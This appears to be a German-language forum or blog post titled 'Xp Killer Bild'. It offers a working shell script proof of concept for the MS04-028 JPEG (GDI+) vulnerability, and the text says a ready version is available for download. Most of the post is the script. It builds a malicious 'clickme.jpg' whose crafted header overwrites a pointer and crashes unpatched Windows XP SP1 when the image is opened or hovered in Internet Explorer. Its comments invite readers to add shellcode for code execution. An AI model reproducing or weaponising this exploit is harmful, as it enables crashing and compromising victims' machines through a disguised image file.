ist der Shell Exploit welches ein Bild erzeugt was unter einem
Ungepatchtem Win xp sp1 den Pc runterfährt. Das ganze ist unter Downloads auch schon fertig zum Download.
Bitte beachten : Nutzung und Verantwortung hat der Nutzer.
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
# The pointer overwrite is pretty straight forward in a debugger
# Usage:
# sh ms04-028.sh > clickme.jpg
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
# - You non-kiddies out there are smart enough to fill in the blanks
# - Until you do the above, it's just a stupid PoC crash
# It's ugly, but it works :)
# -perplexy-
#JPEG header 'n stuff
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
printf "\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
#Trigger string - 00 length field (01 works too)
printf "\xFF\xFE\x00\x00"
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F"
# 1) Opening directly in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F";
# 2) MouseOver in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
: Das lesen des Artikels Xp Killer Bild
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